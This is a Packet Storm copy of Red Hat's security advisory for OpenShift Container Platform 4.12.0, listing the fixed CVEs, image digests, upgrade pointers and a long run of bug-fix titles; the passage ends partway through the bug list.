Security
Headlines
HeadlinesLatestCVEs

Headline

Red Hat Security Advisory 2022-7399-01

Red Hat Security Advisory 2022-7399-01 - Red Hat OpenShift Container Platform is Red Hat’s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.0. Issues addressed include denial of service, memory leak, and out of bounds read vulnerabilities.

Packet Storm
#vulnerability#web#ios#mac#windows#linux#red_hat#dos#js#git#java#kubernetes#perl#ldap#vmware#aws#lenovo#amd#bios#alibaba#oauth#auth#ssh#ibm#rpm#docker#jira#firefox#sap#ssl
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: OpenShift Container Platform 4.12.0 bug fix and security updateAdvisory ID:       RHSA-2022:7399-01Product:           Red Hat OpenShift EnterpriseAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:7399Issue date:        2023-01-17CVE Names:         CVE-2021-4235 CVE-2021-22570 CVE-2021-38561                    CVE-2022-1705 CVE-2022-2879 CVE-2022-2880                    CVE-2022-2995 CVE-2022-3162 CVE-2022-3172                    CVE-2022-3259 CVE-2022-3466 CVE-2022-21698                    CVE-2022-24302 CVE-2022-27664 CVE-2022-30631                    CVE-2022-32148 CVE-2022-32189 CVE-2022-32190                    CVE-2022-41316 CVE-2022-41715 CVE-2022-42010                    CVE-2022-42011 CVE-2022-42012 CVE-2022-42898                    CVE-2023-0296 =====================================================================1. Summary:Red Hat OpenShift Container Platform release 4.12.0 is now available withupdates to packages and images that fix several bugs and add enhancements.This release includes a security update for Red Hat OpenShift ContainerPlatform 4.12.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Red Hat OpenShift Container Platform is Red Hat's cloud computingKubernetes application platform solution designed for on-premise or privatecloud deployments.This advisory contains the container images for Red Hat OpenShift ContainerPlatform 4.12.0. See the following advisory for the RPM packages for thisrelease:https://access.redhat.com/errata/RHSA-2022:7398Space precludes documenting all of the container images in this advisory.See the following Release Notes documentation, which will be updatedshortly for this release, for details about these changes:https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.htmlSecurity Fix(es):* golang: out-of-bounds read in golang.org/x/text/language leads to DoS(CVE-2021-38561)* golang: net/http: improper sanitization of Transfer-Encoding header(CVE-2022-1705)* golang: archive/tar: unbounded memory consumption when reading headers(CVE-2022-2879)* golang: net/http/httputil: ReverseProxy should not forward unparseablequery parameters (CVE-2022-2880)* prometheus/client_golang: Denial of service usingInstrumentHandlerCounter (CVE-2022-21698)* golang: net/http/httputil: NewSingleHostReverseProxy - omitX-Forwarded-For not working (CVE-2022-32148)* golang: net/url: JoinPath does not strip relative path components in allcircumstances (CVE-2022-32190)* vault: insufficient certificate revocation list checking (CVE-2022-41316)* golang: regexp/syntax: limit memory used by parsing regexps(CVE-2022-41715)* openshift: etcd grpc-proxy vulnerable to The Birthday attack against64-bit block cipher (CVE-2023-0296)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s)listed in the References section.3. Solution:See the following documentation, which will be updated shortly for thisrelease, for important instructions on how to upgrade your cluster andfully apply this asynchronous errata update:https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.htmlYou may download the oc tool and use it to inspect release image metadatafor x86_64, s390x, ppc64le, aarch64 architectures.The image digests may be found athttps://quay.io/repository/openshift-release-dev/ocp-release?tab=tagsThe sha values for the release are:(For x86_64 architecture)The image digest issha256:4c5a7e26d707780be6466ddc9591865beb2e3baa5556432d23e8d57966a2dd18(For s390x architecture)The image digest issha256:ab70750be4fadf5a525141ae32a8577c91dd19f1d6e582a6824339c938216ec0(For ppc64le architecture)The image digest issha256:5a5943dea60b40f73ecee685b12fff1d65cc8bfe946f762fdfe862969483ddbb(For aarch64 architecture)The image digest issha256:cb34667519d1cfd8eedf0fb27e14b7b7e6209323b86977bfaadf91da012d179dAll OpenShift Container Platform 4.12 users are advised to upgrade to theseupdated packages and images when they are available in the appropriaterelease channel. To check for available updates, use the OpenShift Consoleor the CLI oc command. Instructions for upgrading a cluster are availableathttps://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html4. Bugs fixed (https://bugzilla.redhat.com/):1843043 - Config api resource has a terrible description1876933 - No useful message after hitting volume attachment limit1879980 - oc adm groups prune  cannot find the groups present in ldap and finishes to delete all of them1894268 - SDN to OVN migration problem due to overlap with "Join network"1896533 - network operator degraded due to additionalNetwork in non-existent namespace1904106 - Graphs in dev console shouldn't go below 01917662 - oc exec cmd run executed file in azure file volume return 139 or exec failed: container_linux.go:366: starting container process caused: interrupted system call1924017 - [OCPonRHV] [Workers only] Special configuration for High Performance VMs is not implemented for worker nodes1944065 - [VPA] recommender is logging errors for pods with init containers1944365 - openstack: missing validation for apiVIP and ingressVIP1951835 - CVO should propagate ClusterOperator's Degraded to ClusterVersion's Failing during install1951901 - incorrect Worker nodes number calculated when nodes have both master and worker role1957709 - Creation of LoadBalancer service (Openstack Lbaas) take too much to be ready when creating IngressControllers with endpointPublishingStrategy=LoadBalancerService1962502 - The route generated from ingress is still admitted after updating the spec.ingressClassName to mismatch1977660 - the pod events show error codes when crio recreate the missing symlinks1997396 - No alerts have triggered for CPU and Memory limit with Cluster Autoscaler2000276 - EncryptionStateControllerDegraded: failed to get converged static pod revision2000552 - must-gather should collect ALL apiservices2000554 - must-gather should collect webhooks service namespaces2001027 - ClusterAutoscaler with balanceSimilarNodeGroups does not scale even across MachineSet2001211 - Resource usage measurement data display the concatenation of English and translation sentence fragments on utilization section  when moving the mouse over each resource usage chart in Developer->Project2001409 - All critical alerts should have links to a runbook2006378 - improve check that verifies task permissions in vsphere2006611 - CVO resolves the version takes a long time sometimes when upgrading via `--to-image`2010365 - OpenShift Alerting Rules Style-Guide Compliance2010375 - OpenShift Alerting Rules Style-Guide Compliance2018481 - [osp][octavia lb] Route shard not consistently served in a LoadBalancerService type IngressController2021297 - Dynamic Plugins: Console isn't honoring declared `@console/pluginAPI` dependency2022328 - kube-controller unpublishing volume after maxWaitForUnmountDuration leaves block devices on node in a inconsistent state2023443 - Console plugin SDK build passes even if there are errors in one of its dist packages2028474 - [OCPonRHV] Remove clustername length limitation(metadata name)2030406 - Dynamic plugin demo nav outputs incorrect markup that doesn't conform to the Console navigation which uses the PatternFly Navigation component2033167 - oc extract ?to option doesn?t create the target directory if it?s not present2033499 - Populate acceptedRisks on Recommended=False updates for conditional edges2034883 - MCO does not sync kubeAPIServerServingCAData to controllerconfig if there are not ready nodes2037329 - [UI] MultiClusterHub details after it's creation starts flickers, disappears and appears back (happened twice)2039411 - Monitoring operator reports unavailable=true while one Prometheus pod is ready2040612 - crio umask sometimes set to 00002043518 - Better message in the CMO degraded/unavailable conditions when pods can't be scheduled2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter2046335 - ETCD Operator goes degraded when a second internal node ip is added2048349 - Service CA Operator does not reconcile for spec.loglevel changes in ServiceCA CRD2048789 - broken toolbox in OCP 4.10 with non-default image2049591 - [RFE] Toolbox - make sure we are running on the latest image?2052662 - Opening Insights popup crashes the page2055247 - [Azure] Fail to create master nodes with dcasv5 /dcadsv5 -series Confidential Virtual Machine2055620 - ImageStreamChange triggers using annotations does not work2056387 - [IPI on Alibabacloud][RHEL scaleup] new RHEL worker were not added into the backend of Ingress SLB automatically2056888 - [Secondary Scheduler] - Version number incorrect in secondary scheduler operator bundle2057637 - default VolumeSnapshotClass created by the csi-driver-manila-operator does not contain secrets2057972 - Extra space is in the translation text(Chinese) of 'Create rolebinding' and 'replicate rolebinding'2059125 - The oc binary for mac arm64 can?t be executed2059599 - [ibm]Lots of info message from ibmcsidriver/identity.go:83 displayed in the log ibm-vpc-block-csi-node/iks-vpc-block-node-driver2060068 - machine-api-provider-aws creates EC2 instances with the default security group when no matching security group is found2060079 - Re-think kubeproxy_sync_proxy_rules_duration_seconds_bucket alerts2061947 - IBM Cloud: Uninstall does not succeed when there is nothing to clean up2062579 - [IBMCloud] Provide invalid profile machine stuck in "Provisioning" phase2063764 - Operators - OperatorHub : i18n misses2065192 - GCP - Less privileged service accounts are created with Service Account User role2065727 - Scaling down an hypershift cluster ends with BMH shutdown and in maintenance mode2066560 - two router pods are in ContainerCreating status when tried to patch ingress-operator with custom error code pages directly2067059 - No topologySpreadConstraints shown in `oc describe resource`2067323 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the gRPC interoperability tests [Suite:openshift/conformance/parallel/minimal]2068910 - After node re-created, some ovn annotations are not found for the node and due to that pod is in crashloop2070562 - Base64 data value for  java keystore secret changing automatically, when we edit it from the console and saving it without doing any changes2071792 - Non-kubeadmin user will not have access to openshift-config ns to pull secret/CM for adding private HCR in a namespace2073617 - [IBM] allowedTopologies in SC causes scheduling to fail when region is empty2075107 - Heading mismatch of CloudShellDrawer & Fullscreen2075607 - [4.10] IBM VPC operator needs e2e csi tests for ibmcloud2077933 - Kube controller manager does not handle new configurations available in the cloud provider OpenStack2078691 - [OVN] Node to service traffic is blocked if service is "internalTrafficPolicy: Local" even backed pod is on the same node2078727 - [IBM] Volume is not provisioned when storageclass Region is provided but without zone info2079214 - modal text goes outside of modal boundary and doesn't have scroll bar2079249 - list pages in pipelines is taking more time to load when there are too many items2079679 - [bz-monitoring][invariant] alert/Watchdog must have no gaps or changes2079690 - [RH OCP 4.9] Affinity definition YAML shows difference in web console2080260 - 404 not found when create Image Manifest Vulnerability on Operator "Container Security"2080449 - [Azure-file CSI Driver] Read/Write permission denied for non-admin user on azure file csi provisioned volume with fsType=ext4,ext3,ext2,xfs2081674 - Developer add page create a new project modal redirects to admin project page after creation2081734 - metal3-dnsmasq: workers are not provisioned during the cluster installation when BootMacAddress is not provided lower-case2082395 - Private cluster installer on Azure asking for baseDomainResourceGroup even when it has nothing to do with basedomain as mentioned in documentation.2082588 - [RFE] Add new Azure instance types to the official "tested/supported" list2082599 - retry logic should have an upper bound on the number of failed attempts2082773 - [AWS-EBS-CSI-driver-Operator] Generic ephemeral volumes online resize Filesystem type volume stucked at file system resize phase2083041 - Updating externalTrafficPolicy=cluster to externalTrafficPolicy=local doesn't work2083226 - alertmanager-main pods failing to start due to startupprobe timeout2084453 - Edit PodDisruptionBudget page sometimes takes user to not synced YAML view2084471 - Capital letters in install-config.yaml .platform.baremetal.hosts[].name cause bootkube errors2084504 - can not silent platform alert from developer console2085390 - machine-controller is case sensitive which can lead to false/positive errors2086231 - Install Shared Resource CSI Driver Webhook2086887 - DNS occasionally unavailable after large scale up operation2087032 - Operator-sdk "run bundle" "run bundleup-grade" can't support proxy env2087679 - EgressQoSes not gathered for debugging purposes2087981 - PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendation2088033 - Clear text password/secret in operator pod2088583 - libguestfs: error: download: /boot/loader/entries/ostree-1-rhcos.conf: No such file or directory2089199 - etcd Dashboard should be removed on guest cluster of hypershift2089221 - Could not de-select a Git Secret in add and edit forms2089402 - BuildConfig throws error when using a label with a / in it2089807 - Many errors when powering off a master2089950 - Upgrade fails with message Cluster operator console is not available2090135 - [upstream] Operator-sdk run bundle offer the wrong error message2090836 - Bootstrap node should honor http proxy2090988 - ReplicaSet prometheus-operator-admission-webhook has timed out progressing2091102 - Name of workload get changed, when project and image stream gets changed on edit deployment page of the workload.2091109 - Add to application dropdown options are not visible on application-grouping sidebar action dropdown.2091238 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory address or nil pointer dereference"2091545 - Namespace value is missing on the list when selecting "All namespaces" for operators2091555 - Sort function doesn't work on "Namespaces" column on  operator details page2091573 - Input values in Instantiate Template are disappeared randomly in the developer console2091864 - Registry Pod don't have "securityContext.runAsNonRoot=true" config that generated by run bundle2092319 - [Firefox] multi-line node status formatting issue2092731 - Give more clear information  when `oc adm release new` without the --keep-manifest-list opotion  for the manifestlist imagestream YAML2092920 - Dependent tasks in Pipeline chart linked incorrectly2093016 - [azure disk] add metric and alert to help identify cascading test failures2093040 - unable to start `toolbox` on RHCOS using `podman` 4.02093046 - must-gather debug pods are missing priority class2093440 - [sig-arch][Early] Managed cluster should start all core operators  - NodeCADaemonControllerDegraded: failed to update object2093826 - Pods with OVN hardware offloading enabled interface fail to start2093852 - Affinity rule created in console deployment for single-replica infrastructure2093892 - no api_key_file field in AlertmanagerConfig, but error message complains it2094012 - Listing secrets in all namespaces with a specific labelSelector does not work properly2094068 - No runbook created for NorthboundStale alert2094101 - `podman` dumping core on RHCOS 4.11 + RHEL 8.6 on `aarch64`2094174 - ReleaseAccepted=False keeps complaining about the update cannot be verified after the upgrade is cleared2094240 - MachineConfigPool details page should use consistent word for resume updating2094362 - Duplicate prometheus rules for API SLOs after upgrade2094462 - DeleteACLsFromPortGroupOps doesn't actually have any UUIDs set, so it deletes nothing and complains2094502 - Creating an MCH instance does not work via blue button2094558 - MetalLB: Creating ip address pool and community CR through webconsole the words like addresses and communities are truncated2094716 - Unable to install a fully air gapped OCP 4.10 cluster in AWS using IPI2094783 - storageclass should not be created for unsupported vsphere version2094865 - INIT container stuck forever2095323 - Openshift on OpenStack does not honor machineNetwork setting with multiple networks2095623 - [rebase v1.24]  [sig-storage] In-tree Volumes [Driver: azure-file] tests fail2095708 - oc adm inspect throws out erorr "the server doesn't have a resource type "egressfirewalls" for all operators2095852 - Unable to create Network Policies: error: unexpectedly found multiple equivalent ACLs (arp v/s arp||nd) (ns_netpol1 v/s ns_netpol2)2097026 - Administration - Cluster Settings - Cluster Operators : Filter menu values are in English2097073 - etcdExcessiveDatabaseGrowth should not use increase() around gauge metrics2097221 - [OVN HWOL] Avoid masked access to ct_label to allow offloading of ECMP symmetric reply and load balanced traffic2097243 - NodeIP is used instead of EgressIP2097431 - Degraded=True noise with: UpgradeBackupControllerDegraded: unable to retrieve cluster version, no completed update was found in cluster version status history2097557 - can not upgrade. Incorrect reading of olm.maxOpenShiftVersion2097691 - [vsphere] failed to create cluster if datacenter is embedded in a Folder2097701 - MetaLLB: Validation  unable to create BGPPeers with spec.peerASN  Value in OCP 4.102097785 - Ensure OSUpdateStaged gets sent to the API server before rebooting2098053 - Add a e2e test to validate address mismatch between pod address family and external gw family2098054 - The control plane should tag AWS security groups at creation2098072 - [vsphere] update install-config description for diskType2098124 - [Kubernetes] [ISCSI] ipv6 single stack cluster could not get SCSI server host number2098234 - Local Update Server link 4042098299 - install-config: Strict unmarshalling conflicts with new fields2099401 - [IBMCloud] Client does not set region endpoint for InstallConfig2099664 - MachineConfigPool is not getting updated2099795 - README file for helm charts coded in Chinese shows messy characters when viewing in developer perspective.2099864 - vmware-vsphere-csi-driver-controller can't use host port error on e2e-vsphere-serial2099939 - enabled UWM alertmanager only, user project AlertmanagerConfig is not loaded to UWM alertmanager or platform alertmanager2099945 - [OVN] bonding fails after active-backup fail-over and reboot,  kargs static IP2099991 - pass the "--quiet" option via the buildconfig for s2i2100166 - heterogeneous arch: oc adm extract encodes arch specific release payload pullspec rather than the manifestlisted pullspec2100220 - Completed pods may not be correctly cleaned up2100249 - Revert Bug 2082599: add upper bound to number of failed attempts2100312 - should use the same value for AlertRelabelConfig with oc explain2100334 - Event sources do not show up until KnativeServing is installed2100342 - Operator-sdk run bundle offer the wrong error message2100472 - TechPreview feature is not enabled, but find "failed to list *v1alpha1.AlertingRule: alertingrules.monitoring.openshift.io is forbidden" in cmo logs2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS2100640 - "Show operands in all namespaces" radio group font size is too large.2100702 - No need to pass to-image-base for `oc adm release new` command when use --from-release2100708 - Print the dup choose image message is noisy2100774 - In the Deploy Image form Image name from external registry field Required text is not red as other fields2100843 - Selecting add connector context menu option opens the side panel of the node2100845 - MetalLB:  matchExpressions used in CR like L2Advertisement allow duplicate entries2100852 - worker-user-data secret couldn't be synced up from openshift-mahcine-api to openshift-cluster-api2100860 - Users can't silence alerts from the dev console when dedicated UWM Alertmanager is deployed2100882 - downloading govc is impacted by github rate limiting2100918 - Add debug logging to TestIngressOperatorCacheIsNotGlobal2100923 - [SSO] Deleting secondary scheduler CR does not delete the corresponding deployment2101157 - OVS-Configure doesn't iterate connection names containing spaces correctly2101343 - topolvm-controller get into CrashLoopBackOff few minutes after install2101357 - catalog-operator fatal error: concurrent map writes2101444 - kube-apiserver-operator should raise an alert when there is a Pod Security admission violation2101511 - [4.12] Tag new ironic packages when we have builds2101520 - csi-snapshot-controller-operator occasionally establishes an unusual number of watch requests2101622 - Drain happens before other image-registry pod is ready to service requests, causing disruption2101645 - [Cluster storage Operator] DefaultStorageClassController report fake message "No default StorageClass for this platform" on azure and openstack2101736 - Finalizers can't be removed for machines2101843 - pv fails to recycle with PodSecurity error2101878 - Route status isn't always getting cleared with routeSelector updates2101880 - [cloud-credential-operator]container has runAsNonRoot and image will run as root2101885 - The bash completion doesn't work for get subcommand2101992 - [Azure] IP address release: After deleting and recreating egressIP object, egress traffic was intermittently broke for about 1 minute2102004 - 4.10 to 4.11 update: Degraded node: unexpected on-disk state: mode mismatch for file: "/etc/crio/crio.conf.d/01-ctrcfg-pidsLimit"; expected: -rw-r--r--/420/0644; received: ----------/0/02102098 - [OSD] There is no error message shown on node label edit modal2102109 - co/node-tuning: Waiting for 15/72 Profiles to be applied2102228 - Update rhcos.json in installer to point at new CDN2102269 - The base image is still 4.10 for operator-sdk2102324 - GCP: Panic when unknown region AND machinesets specified in install config2102341 - [UI] ODF operator icon is missing on the Installed Operators page2102344 - [SSO] sso operator cannot be upgraded from 1.0.0 to 1.0.1 or 1.12102371 - Openshift-Ansible RHEL 8 CI update2102383 - Kube controllers crash when nodes are shut off in OpenStack2102450 - Kernel parm needs to be added when a pao performance profile is applied, rcutree.kthread_prio=112102632 - a shorter cluster name leads to Uninstall fails with Observed a panic: runtime.boundsError2102673 - FRR start race condition2102676 - Updates / config metrics are not available in 4.112102766 - OCP 4.12 Using RHCOS 411.842103061 - [4.12] Backport Prow CI improvements from master2103090 - Storage - StorageClasses - Create StorageClass - Provisioner: Upon selection of Provisoner i18n misses2103126 - must-gather namespace should have ?privileged? warn and audit pod security labels besides enforce2103144 - [IPv6] apiVIP and ingressVIP non-equality validation doesn't account for synonyms2103178 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces2103224 - Sidebar perspective dropdown switcher has different background color and incorrect border color when in dark theme mode2103236 - GCP: Error message for insufficient permissions needs to be improved2103283 - In CI 4.10 HAProxy must-gather takes longer than 10 minutes2103590 - [HyperShift] Election timeouts on OVNKube masters for Hypershift guests post statefulset recreation2103668 - ovnkube-node pod fails to start - unable to add OVN masquerade route to host, error: failed to add route for subnet - after upgrading to 4.102103680 - Setting disableNetworkDiagnostics: true does not persist when network-operator pod gets re-created2103725 - Carry HAProxy patch 'BUG/MEDIUM: h2: match absolute-path not path-absolute for :path'2103786 - MCP upgrades can stall waiting for master node reboots since MCC no longer gets drained2103940 - kube-controller-manager operator 4.11.0-rc.0 degraded on disabled monitoring stack2103972 - Pipelines (Multi-column table) column titles are not aligned with the column content (input fields) starting with 4.92103981 - Topology resource sidebar shows all Builds and should show just the last n2104275 - Supermicro server FirmwareSchema CR does not contain allowable_values, attribute_type and read_only flag2104337 - Remove `yq` curls from CI steps2104373 - [AWS] CCM cannot work on Commercial Cloud Services (C2S) Top Secret Region2104481 - PROXY protocol is not configurable for "private" endpoint publishing strategy2104503 - Update ose-machine-config-operator images to be consistent with ART2104549 - telemeter golangci-lint outdated blocking ART PRs that update to Go1.182104578 - Installer creates unnecessary master_ingress_cluster_policy_controller security group rule2104619 - Upgrade from 4.11.0-rc0 -> 4.11.0-rc.1 failed. rpm-ostree status shows No space left on device2104642 - Add a validation webhook for Nutanix machine provider spec in Machine API Operator2104784 - Some EgressIP was not correctly assigned to the egress node under some condition2104803 - lr-policy-list for EgressIP was lost after scale down the test pods2104953 - Reintroduce kube1.24 for SDN2105003 - e2e-metal-ipi-ovn-dualstack failure: Timed out waiting for node count (5) to equal or exceed machine count (6).2105045 - OLM updates namespace labels even if they haven't changed2105071 - container-selinux: Mostly-confined containers which create their own user and mount namespaces can't mount overlay filesystems2105123 - Tuned overwriting IRQBALANCE_BANNED_CPUS2105165 - [IPI-IBMCloud] explain installconfig.platform.ibmcloud.resourceGroupName need update2105303 - Specify the namespace and the index entry along with the chart url to get the chart details2105325 - [oc adm release] extraction of the installer against a manifestlisted payload referenced by tag leads to a bad release image reference2105328 - crud/other-routes.spec.ts Cypress test failing at a high rate in CI2105341 - Bootstrap Gather Fails when cluster.tfvars.json is not available in Azure2105344 - Console app pod action provider extension is incorrectly defined2105399 - [SSO] secondary scheduler CR instance does not get updated when SSO is upgraded from 1.0.1 to 1.1.02105706 - Race condition with pendingCloudPrivateIPConfigsOps in EgressIP code2105909 - OLM create-namespace.spec.ts e2e test fails always2105918 - Install Helm chart form doesn't allow the user select a specific version2105933 - OKD: update FCOS to latest stable2105967 - Add E2E test case for Telco Friendly workload specific API2105996 - Broken assign error display for cloudprivateipconfig2106044 - etcd backup seems to not be triggered in 4.10.18-->4.10.20 upgrade2106055 - vSphere defaults to SecureBoot on; breaks installation of out-of-tree drivers2106061 - [4.12] Bootimage bump tracker2106086 - IngressController spec.tuningOptions.healthCheckInterval validation allows invalid values such as "0abc"2106298 - unix domain socket mode is broken when specified as ovn database transport method2106366 - ProjectHelmChartRepository form doesn't allow the user to make a difference between name and displayname2106372 - TypeError while creating NodeObservability Run under NodeObservability Operator2106377 - ProjectHelmChartRepository display name (spec.name) is not used in Helm Charts catalog2106378 - Spoke BMH stuck ?provisioning? after changing a BIOS attribute via the converged workflow2106403 - Nutanix: the e2e-nutanix-operator webhooks test suite does not support provider Nutanix2106444 - EgressnodeIP update need special logic to handle creation errors2106449 - openshift4/ose-operator-registry image is vulnerable to multiple CVEs2106476 - Order of config attributes are not maintained during conversion of PT4l from ptpconfig to ptp4l.0.config file2106667 - UPI: Install playbooks don't honour platform.openstack.externalDNS2106733 - Machine Controller stuck with Terminated Instances while Provisioning on AWS2106770 - metallb greenwave tests failure2106803 - E2E: intermittent failure is seen on tests for devfile2106805 - Spec flag not overriding defaults in headless cypress tests2106862 - After ovnkube-node restart, external traffic policy local no longer works2106866 - Test Flake - Using OLM descriptor components successfully creates operand using form2106935 - kubernetes-nmstate-operator fails to install with error "no channel heads (entries not replaced by another entry) found in channel"2107043 - HTTPS_PROXY ENV missing in some CSI driver operators2107068 - etcd-metrics container is flooding logs2107113 - Adding SSH keys for core user post-install creates .ssh folder owned by root2107178 - Bond CNI: Failed to recreate pod with active-active bond: Failed to attached links to bond: Failed to set link: net2 MASTER, master index used: 4, error: bad address2107241 - [OCPonRHV] CSI provisioned disks are effectively preallocated due to go-ovirt-client setting Provisioned and Initial size of the disk to the same value2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working2107469 - Confusing subtitle in Create Service Binding modal when the target is already known2107513 - [SSO] 1.0.1 csv is pulling in secondary-scheduler-operator-container-v1.1-52107558 - When deploying via the web ui, the namespace is always openshift-operators2107566 - [GCP] create gcpcluster get error2107578 - Power VS machine Processor is always defaulted to 0.52107999 - [GCP] capg-controller-manager report panic after creating machineset and machine stuck in Provisioning2108033 - remove ovn-kubernetes dependency on arping executable file2108054 - Report alert when upstream CSI driver is found2108222 - Missing spec.cpu.offlined field in v1 API2108307 - oc debug node should set hostIPC to true2108317 - Fix two issues in hybrid overlay2108320 - rpm-ostreed: start limit hit easily2108473 - [vSphere CSI driver operator] CSI controller pod restarting constantly2108551 - [CI Watcher] Bulk Import e2e test flaking at a high rate2108647 - [azure] Standard_D2s_v3 as worker failed by ?accelerated networking not supported on instance type?2108708 - Ingress operator creates a "default" ingresscontroller on HyperShift2108858 - cluster-version operator should clear (pod) securityContext when the manifest does not set the property2109045 - ovn-k needs kubernetes 1.24 bump2109056 - Bring avoidbuggyips back2109059 - Reply to arp requests on interfaces with no ip2109152 - Kube-apiserver was down and could not recover2109258 - Legacy machine deletion annotation is not respected2109374 - ClusterVersion availableUpdates is stale: PromQL conditional risks vs. slow/stuck Thanos2109388 - [AWS] s3 GetBucketPolicy permission is missing in installer validation2109469 - Code cleanup: Don't call useServiceLevelTitle hook in the JSX2109502 - Prerelease report bug link should be updated to JIRA instead of Bugzilla2109511 - Failed PipelineRun logs text is not visible in light mode2109538 - Nutanix platform validations run at `create manifests` stage2109697 - Migrate openshift-ansible to ansible-core2109800 - [IBMCloud] context deadline exceeded for kube-scheduler targets2109854 - Max unavailable and Max surge have inaccurate description2109945 - HyperShift: ovnkube-node not able to connect to sbdb2109963 - Master node in SchedulingDisabled after upgrade from 4.10.24 -> 4.11.0-rc.42109965 - oci hook Low-latency-hooks causing high container creation times under platform cpu load2109967 - failed to apply dns nncp on vSphere/OpenStack platform2110281 - daemon: Drop tuneableFCOSArgsAllowlist2110321 - Workloads list page has different PDB action items from details page when All Projects selected2110501 - [Upgrade]deployment openshift-machine-api/machine-api-operator has a replica failure FailedCreate2110525 - Form/YAML form errors stay around2110590 - Upgrade failing because restrictive scc is injected into version pod2110617 - Split the route controllers out from OCM2110629 - openshift-controller-manager(-operator) namespace should clear run-level annotations2110722 - openshift-tests: allow -f to match tests for any test suite2110927 - Edit YAML page shows unexpected zero (0) and doesn't clear errors anymore2111151 - Cannot delete a Machine if a VM got stuck in ERROR2111165 - Project auth cache is fully invalidated on changes to namespaces and namespaced RBAC2111205 - console-plugin-demo build failing in CI2111467 - Node internal DNS address is not set for machine2111474 - Fetch internal IPs of vms from dhcp server2111534 - [OVNK] Conntrack Rules are removed before the service rules/flows2111537 - oc image info ignores --output for multiarch image2111586 - Export OVS metrics2111686 - [OKD/nanokube] Different NPE when using console with a nanokube cluster2111733 - pod cannot access kubernetes service2111817 - rpm-ostreed start timeout on nodes with medium/high load2111842 - vSphere test failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]2111878 - Azure EgressIP gives up reconciling with No matching nodes found when updating the same egressip consecutively2111972 - openshift-machine-api namespace runlevel label should be set to empty string2111979 - openshift-controller-manager-operator NS runlevel needs to be set to emptystring2111984 - OpenShift controller manager needs permissions to get/create/update leases for leader election2112086 - [hybrid-overlay] AWS EC2 metadata service not available in host's vNIC for Windows2112146 - [CI watcher] Create pod sample fail because of a restricted pod security admission policy2112237 - [ Cluster storage Operator 4.x(10/11/12) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM, Nutanix2112481 - Synced editor forms have incorrect and inconsistent visual display2112812 - [OCP 4.10] Developer catalog fails to load (on a fully disconnected cluster and on a disconnected cluster with proxy)2112862 - Namespace CRUD integration test is failing2112934 - The oc adm inspect ns/[namespace_name] command is not collecting the servicemonitors in the namespace2113936 - Fix e2e tests for [reboots][machine_config_labels] (tsc=nowatchdog)2113977 - Fix pod stuck in termination state when mount fails or gets skipped after kubelet restart2114009 - [4.12 Alicloud Snapshot] taking more time(4min+) to make snapshot content with ready status and (volume/snapshot content) getting created in default Resource group id2114488 - Monitoring Alert decorator in Topology color is grey instead of red2114506 - olm e2e failing when capabilities are disabled2114721 - telemeter-client pod does not use the updated pull secret when it is changed2114754 - "gather bootstrap" creates unexpected folder "serial-log-bundle-<timestamp>" beyond "log-bundle-<timestamp>.tar.gz"2114779 - Node Tuning Operator(NTO) - OCP upgrade failed due to node-tuning CO still progressing2114834 - Failure when creating Floating IP for load-balancer2114968 - 4.12-nightly payloads blocked by metal jobs failing with "Still creating ..." when creating nodes2115308 - Kube API server operator should not update replicas when Machine/Node is being removed2115347 - 03279843 | Sev 3 | Negative regex matchers for alertmanager silences not properly parsed or read by console2115358 - control-plane-machine-set-operator pod got panic when create cpms on a single zone deployment2115479 - ovnkube direct-lists pods on a node when the node object changes2115522 - Strange padding in new Helm Chart Repository table row2115527 - ServiceAccounts PATCH noise leads to Secret leakage2115528 - bump bootimage to include latest rpm-ostree2115638 - CPMS cannot trigger RollingUpdate when adding failure domain2115684 - Gather ODF CephCluster resource status2115790 - [4.12] Bootimage bump tracker2115799 - CI failing tests: Perform actions on knative service and revision knative service menu options2115802 - Minor test fixes related to getting updated profile and checking kubeletconfiguration2115814 - Issues with samples in a disconnected cluster in OCP 4.92115899 - BuildConfig form: Docker image repository should be just called Image registry2116382 - Setting a telemeter proxy in the cluster-monitoring-config config map does not work as expected2116415 - CI failing tests: Event tab in build details page2116460 - percpu  Memory leak CRIO due to no garbage collection in /run/crio/exits for exited containers2116547 - phyc2sys config will be automatically added to ptpconfigs even if it is not included in user PGT2116715 - remove dead code from openshift-controller-manager2116973 - Multiple navigation items displaying as active2116982 - multus-admission-controller in openshift-multus has 2 replicas on SNO2117033 - Cluster-version operator ClusterOperator checks are unecessarily slow on update2117142 - Update the permission for Project Helm Chart Repository2117235 - separate route controllers to a new command2117255 - Failed to dump flows for flow sync, stderr: "ovs-ofctl: br-ext is not a bridge or a socket"2117310 - [OVN] New pods unable to establish TCP connections and get constant timeouts causing application downtime2117387 - vsphere: installer for vsphere does not have steal clock accounting enabled2117423 - Backport:  https://github.com/openshift/kubernetes/pull/12952117439 - change controlplanemachineset machineType to other type trigger RollingUpdate cause cluster error2117474 - ccoctl panics while trying to create a secret from credential request which does not have providerspec within it2117524 - openshift-ingress-operator with mTLS does not download CRL2117569 - kube-controller-manager needs to stop watching all events2117595 - Upgrade golangci-lint to 1.47.3 in image-customization-controller2117602 - LocalVolume does support by-path volumes2117646 